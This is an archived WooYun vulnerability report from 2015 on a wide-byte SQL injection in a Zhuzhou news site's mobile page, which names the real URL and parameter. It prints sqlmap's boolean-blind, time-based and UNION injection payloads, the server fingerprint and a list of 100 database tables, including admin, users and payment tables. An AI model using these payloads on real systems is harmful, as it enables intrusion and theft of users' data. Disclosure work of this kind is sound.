当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
wooyun-2015-0159239
漏洞标题:
株洲在线某站存在SQL注入漏洞
相关厂商:
zzz4.com
漏洞作者:
深度安全实验室
提交时间:
2015-12-08 10:45
修复时间:
2016-01-21 18:22
公开时间:
2016-01-21 18:22
漏洞类型:
SQL注射漏洞
危害等级:
自评Rank:
15
漏洞状态:
厂商已经确认
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:
>

漏洞详情

披露状态:

2015-12-08: 细节已通知厂商并且等待厂商处理中
2015-12-08: 厂商已经确认,细节仅向厂商公开
2015-12-18: 细节向核心白帽子及相关领域专家公开
2015-12-28: 细节向普通白帽子公开
2016-01-07: 细节向实习白帽子公开
2016-01-21: 细节向公众公开

简要描述:

详细说明:

http://m.zzz4.com/pk/info.php?id=1

宽字节注入

3.jpg

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id=1' RLIKE (SELECT (CASE WHEN (2446=2446) THEN 1 ELSE 0x28 END))
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: id=1' AND (SELECT * FROM (SELECT(SLEEP(5)))njch)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 20 columns
    Payload: id=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a767071,0x6e7450765967766c4b6f,0x716b707671),NULL,NULL,NULL,NULL,NULL,NULL#
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.14
back-end DBMS: MySQL 5.0.12
Database: zx_db
[100 tables]
+----------------------------+
| loupan_info                |
| loupan_info_copy           |
| zx_activity                |
| zx_activity_cate_maps      |
| zx_activity_cates          |
| zx_activity_join           |
| zx_ad_sign                 |
| zx_admin                   |
| zx_ads                     |
| zx_announcement            |
| zx_appointment             |
| zx_area                    |
| zx_ask                     |
| zx_ask_answer              |
| zx_ask_cates               |
| zx_ask_supply              |
| zx_bbs                     |
| zx_bbs_cates               |
| zx_bbs_reply               |
| zx_building                |
| zx_building_copy           |
| zx_building_site           |
| zx_case                    |
| zx_case_cate_maps          |
| zx_case_cates              |
| zx_case_love               |
| zx_case_pics               |
| zx_case_project            |
| zx_case_project_cate_maps  |
| zx_certificate             |
| zx_city                    |
| zx_comments                |
| zx_content                 |
| zx_content_cates           |
| zx_content_project         |
| zx_dec_com_cates           |
| zx_dec_company             |
| zx_dec_company_cate_maps   |
| zx_dec_company_dianping    |
| zx_dec_company_templates   |
| zx_dec_team                |
| zx_dec_team_cate_maps      |
| zx_dec_team_cates          |
| zx_designer                |
| zx_designer_cate_maps      |
| zx_designer_cates          |
| zx_diary                   |
| zx_diary_cates             |
| zx_domain                  |
| zx_files                   |
| zx_group                   |
| zx_group_map               |
| zx_integral                |
| zx_integral_exchange       |
| zx_integral_shop           |
| zx_integral_used           |
| zx_knowledge               |
| zx_knowledge_cates         |
| zx_links                   |
| zx_lrzxrj                  |
| zx_lrzxrj_cate             |
| zx_lrzxrj_pic              |
| zx_mater_com_cates         |
| zx_mater_company           |
| zx_mater_company_cate_maps |
| zx_materials               |
| zx_memo                    |
| zx_menu                    |
| zx_mobiles                 |
| zx_pay_logs                |
| zx_payment                 |
| zx_preferential            |
| zx_preferential_cate_maps  |
| zx_preferential_cates      |
| zx_privilege               |
| zx_privilege_group         |
| zx_product                 |
| zx_product_cates           |
| zx_roomtypecalc            |
| zx_sensitiveword           |
| zx_setting                 |
| zx_system_content          |
| zx_system_logs             |
| zx_template_setting        |
| zx_template_setting_copy   |
| zx_templates               |
| zx_tenders                 |
| zx_tenders_look            |
| zx_tenders_look_detail     |
| zx_tenders_maps            |
| zx_tenders_setting         |
| zx_tuan                    |
| zx_tuan_cates              |
| zx_tuan_orders             |
| zx_users                   |
| zx_users_bonus             |
| zx_users_ex                |
| zx_users_gold_pay_logs     |
| zx_via                     |
| zx_zxrj                    |
+----------------------------+


漏洞证明:

修复方案:

版权声明:转载请注明来源 深度安全实验室@乌云

>

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2015-12-08 11:27

厂商回复:

漏洞已修复,谢谢检测

最新状态:

暂无